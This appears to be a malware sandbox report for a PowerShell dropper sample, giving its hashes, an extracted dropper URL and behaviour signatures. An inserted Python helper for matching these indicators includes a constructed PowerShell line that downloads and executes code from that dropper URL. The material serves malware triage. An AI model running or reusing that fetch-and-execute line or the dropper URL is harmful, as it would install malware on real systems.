General

  • Target

    a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181 (1)

  • Size

    4KB

  • Sample

    210421-t5f8g6t9r2

  • MD5

    25e566c75a0a96543265794571364d6b

  • SHA1

    6f213ef7bd175a4815ce266fe8a1824a0884cf81

  • SHA256

    a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181

  • SHA512

    294d587a88cd4504a446741acce25a547ac8b928201ddf7071996306fc40dd5a9119120f9875a798ca8caac55b71130c421a91b3bcdcc659c58f95f599ce55e2

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper: https://eu.aemaccounting.com/platform.html?id=303
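The report gives two kinds of indicators: the file hashes of the 4KB PowerShell sample and the URL pulled out of the ps1 dropper. The helper below is an added example, not part of the sandbox report or the sample, that turns those indicators into a check an analyst can run: it hashes files and matches them against the report's digests (case-insensitively, since tools differ in hex casing), and it extracts literal http(s) URLs from PowerShell text and intersects them with the dropper URL listed above. `SAMPLE_PS1` is a constructed one-liner for the URL extractor to exercise; it is not the real dropper's contents, and the `DownloadString` call in it is an illustrative assumption.

```python
"""IOC triage helper for the indicators listed in this report.
Added example; the report itself contains no code."""
import hashlib
import re
from typing import Dict, Set

# Indicators copied from the report above.
REPORT_IOCS: Dict[str, str] = {
    "md5": "25e566c75a0a96543265794571364d6b",
    "sha1": "6f213ef7bd175a4815ce266fe8a1824a0884cf81",
    "sha256": "a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181",
    "sha512": "294d587a88cd4504a446741acce25a547ac8b928201ddf7071996306fc40dd5a"
              "9119120f9875a798ca8caac55b71130c421a91b3bcdcc659c58f95f599ce55e2",
}
DROPPER_URLS: Set[str] = {"https://eu.aemaccounting.com/platform.html?id=303"}

ALGORITHMS = ("md5", "sha1", "sha256", "sha512")


def _new_hashers():
    return {name: hashlib.new(name) for name in ALGORITHMS}


def hash_bytes(data: bytes) -> Dict[str, str]:
    """Compute all four digests the report lists, over an in-memory buffer."""
    hashers = _new_hashers()
    for h in hashers.values():
        h.update(data)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_file(path: str, chunk_size: int = 1 << 20) -> Dict[str, str]:
    """Same digests, streamed from disk so large files are not read whole."""
    hashers = _new_hashers()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def match_iocs(digests: Dict[str, str], iocs: Dict[str, str] = REPORT_IOCS) -> Set[str]:
    """Names of the algorithms whose digest equals the report's value.
    Hex casing is normalised because different tools emit upper or lower case."""
    return {
        name for name, value in digests.items()
        if name in iocs and value.lower() == iocs[name].lower()
    }


# Literal http(s) URLs; stops at whitespace, quotes, backticks and brackets,
# which is what terminates a URL literal in PowerShell source.
URL_RE = re.compile(r"""https?://[^\s'"`<>()]+""", re.IGNORECASE)


def extract_urls(ps1_text: str) -> Set[str]:
    """Pull literal URLs out of PowerShell text, dropping trailing punctuation."""
    return {m.rstrip(".,;") for m in URL_RE.findall(ps1_text)}


def scan_ps1_for_dropper_urls(ps1_text: str, known: Set[str] = DROPPER_URLS) -> Set[str]:
    """URLs in the script that are also listed as dropper URLs in the report."""
    return extract_urls(ps1_text) & known


# Constructed sample, NOT the real dropper: a hypothetical one-liner that
# fetches the report's URL, so the extractor has something to find.
SAMPLE_PS1 = (
    "$u = 'https://eu.aemaccounting.com/platform.html?id=303';\n"
    "Invoke-Expression (New-Object Net.WebClient).DownloadString($u)\n"
)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        hits = match_iocs(hash_file(path))
        verdict = "MATCH " + ",".join(sorted(hits)) if hits else "no match"
        print(f"{path}: {verdict}")
    print("dropper URLs in constructed sample:", scan_ps1_for_dropper_urls(SAMPLE_PS1))
```

Run it as `python ioc_check.py suspect.ps1 other.bin` to hash candidate files against the report; a hit on any single algorithm is enough to flag the file, and disagreement between algorithms would indicate a transcription error in the indicator set rather than a partial match.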

Targets

    • Target

      a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181 (1)


    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Matrix (ATT&CK v6)

Discovery

    • System Information Discovery (T1082)